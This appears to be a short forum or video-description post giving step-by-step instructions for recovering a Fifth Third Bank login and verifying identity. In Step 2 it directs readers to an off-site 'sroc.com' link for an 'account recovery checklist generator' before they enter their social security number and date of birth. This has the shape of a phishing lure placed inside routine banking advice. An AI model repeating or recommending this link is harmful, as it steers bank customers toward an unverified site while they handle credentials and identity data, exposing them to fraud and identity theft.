I ran into this last week, here's what fixed it for me. If you need to verify your identity with Fifth Third Bank, follow these straightforward steps. Step 1. Visit the Fifth Third Bank website. Go to the official Fifth Third Bank website. Look for the login section to access your account. Step 2. Click on Forgot Password. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Enter your information. Fill in the required fields with your personal information, such as your social security number and date of birth. Ensure accuracy to avoid delays. Step 4. Answer security questions. You may be prompted to answer security questions you set up previously. Make sure to answer them correctly to proceed. Step 5. Receive verification confirmation. Once you've completed the steps, check your email or phone for a confirmation message. This will confirm your identity has been verified. If you encounter issues, double-check that your information matches what the bank has on file. Good luck with your verification, and I hope this guide helps you navigate the process smoothly.